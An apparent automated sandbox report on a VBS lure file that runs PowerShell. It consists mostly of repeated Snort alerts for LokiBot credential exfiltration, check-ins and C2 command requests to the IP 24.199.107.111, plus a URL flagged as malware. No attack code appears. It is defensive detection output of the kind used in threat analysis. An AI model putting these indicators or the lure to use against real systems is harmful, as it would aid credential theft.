              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:51.436031
              SID:2021641
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:58.054488
              SID:2021641
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:56.706824
              SID:2025381
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:01.992569
              SID:2024313
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:54.064385
              SID:2025381
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:16.137495
              SID:2025381
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:01.992569
              SID:2024318
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:07.211883
              SID:2025381
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:50.128905
              SID:2025381
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:08.287618
              SID:2024318
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:22.462652
              SID:2024318
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:38.343274
              SID:2021641
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:17.411805
              SID:2021641
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:46.232170
              SID:2024313
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:22.462652
              SID:2024313
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:08.287618
              SID:2024313
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:11.056904
              SID:2021641
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:11.036801
              SID:2024313
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:01.755192
              SID:2021641
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:26.304472
              SID:2025381
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:31.417776
              SID:2021641
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:08.492047
              SID:2021641
              Source Port:49731
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:06.993244
              SID:2025381
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:04.601915
              SID:2021641
              Source Port:49728
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:00.650946
              SID:2021641
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:09.740290
              SID:2025381
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:43.577757
              SID:2025381
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:51.563444
              SID:2025381
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:46.232170
              SID:2024318
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:32.674567
              SID:2024318
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:32.674567
              SID:2024313
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:40.987319
              SID:2021641
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:52.727351
              SID:2024313
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:24.990290
              SID:2024318
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:24.990290
              SID:2024313
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:48.869530
              SID:2021641
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:44.926071
              SID:2021641
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:52.727351
              SID:2024318
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:03.069976
              SID:2025381
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:18.646857
              SID:2025381
              Source Port:49739
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:59.337353
              SID:2024313
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:52.788914
              SID:2024317
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:23.725040
              SID:2025381
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:59.337353
              SID:2024318
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:33.969601
              SID:2021641
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:00.483740
              SID:2025381
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:14.853773
              SID:2021641
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:42.247156
              SID:2024318
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:52.788914
              SID:2024312
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:42.247156
              SID:2024313
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:51.436031
              SID:2024313
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:39.649079
              SID:2024318
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:28.852627
              SID:2025381
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:47.546903
              SID:2021641
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:35.272659
              SID:2021641
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:59.169571
              SID:2021641
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:51.436031
              SID:2024318
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:03.069976
              SID:2024313
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:03.069976
              SID:2024318
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:39.649079
              SID:2024313
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:40.987319
              SID:2025381
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:05.927820
              SID:2024313
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:51.563444
              SID:2021641
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:05.927820
              SID:2024318
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:01.992569
              SID:2021641
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:56.584321
              SID:2025381
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:44.926071
              SID:2025381
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:32.674567
              SID:2025381
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:21.167396
              SID:2025381
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:08.287618
              SID:2021641
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:22.462652
              SID:2021641
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:00.483740
              SID:2021641
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:38.343274
              SID:2024313
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:30.148760
              SID:2024313
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:42.247156
              SID:2025381
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:19.900785
              SID:2025381
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:05.710998
              SID:2025381
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:17.411805
              SID:2024313
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:38.343274
              SID:2024318
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:17.411805
              SID:2024318
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:23.725040
              SID:2021641
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:59.337353
              SID:2025381
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:57.883313
              SID:2025381
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:08.492047
              SID:2024313
              Source Port:49731
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:12.336916
              SID:2024313
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:04.601915
              SID:2024318
              Source Port:49728
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:55.405038
              SID:2025381
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:00.650946
              SID:2024318
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:56.706824
              SID:2021641
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:04.601915
              SID:2024313
              Source Port:49728
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:08.492047
              SID:2024318
              Source Port:49731
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:12.336916
              SID:2024318
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:00.650946
              SID:2024313
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:54.064385
              SID:2024318
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:54.064385
              SID:2024313
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:30.148760
              SID:2024318
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:11.056904
              SID:2025381
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:54.038795
              SID:2025381
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:26.304472
              SID:2024313
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:04.366648
              SID:2021641
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:03.295987
              SID:2025381
              Source Port:49727
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:13.616364
              SID:2021641
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:33.969601
              SID:2024318
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:05.927820
              SID:2021641
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:26.304472
              SID:2024318
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:33.969601
              SID:2024313
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:59.169571
              SID:2024318
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:01.755192
              SID:2025381
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:11.036801
              SID:2025381
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: Request for Proposal Quote_2414976#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: unknownHTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2539882083.00000000089E0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49717 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49717 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49717 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49717 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49718 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49718 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49718 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49718 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49719 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49719 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49720 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49720 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 24.199.107.111:80
